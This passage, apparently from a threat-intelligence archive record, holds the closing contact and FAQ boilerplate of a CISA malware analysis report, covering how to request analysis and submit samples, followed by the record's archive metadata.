Handling for Desktops and\r\nLaptops\".\r\nContact Information\r\nDocument FAQ\r\nWhat is a MIFR? A Malware Initial Findings Report (MIFR) is intended to provide organizations with malware analysis in\r\na timely manner. In most instances this report will provide initial indicators for computer and network defense. To request\r\nadditional analysis, please contact CISA and provide information regarding the level of desired analysis.\r\nWhat is a MAR? A Malware Analysis Report (MAR) is intended to provide organizations with more detailed malware\r\nanalysis acquired via manual reverse engineering. To request additional analysis, please contact CISA and provide\r\ninformation regarding the level of desired analysis.\r\nCan I edit this document? This document is not to be edited in any way by recipients. All comments or questions related to\r\nthis document should be directed to the CISA at 1-844-Say-CISA or CISA Central .\r\nCan I submit malware to CISA? Malware samples can be submitted via three methods:\r\nWeb: https://malware.us-cert.gov\r\nE-Mail: submit@malware.us-cert.gov\r\nFTP: ftp.malware.us-cert.gov (anonymous)\r\nCISA encourages you to report any suspicious activity, including cybersecurity incidents, possible malicious code, software\r\nvulnerabilities, and phishing-related scams. Reporting forms can be found on CISA's homepage at www.cisa.gov.\r\nSource: https://us-cert.cisa.gov/ncas/analysis-reports/ar21-055a\r\nhttps://us-cert.cisa.gov/ncas/analysis-reports/ar21-055a\r\nPage 13 of 13",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia"
	],
	"origins": [
		"web"
	],
	"references": [
		"https://us-cert.cisa.gov/ncas/analysis-reports/ar21-055a"
	],
	"report_names": [
		"ar21-055a"
	],
	"threat_actors": [],
	"ts_created_at": 1775434755,
	"ts_updated_at": 1775826688,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/81de79bcb268a20bce9c617716203e7ac95912b0.pdf",
		"text": "https://archive.orkl.eu/81de79bcb268a20bce9c617716203e7ac95912b0.txt",
		"img": "https://archive.orkl.eu/81de79bcb268a20bce9c617716203e7ac95912b0.jpg"
	}
}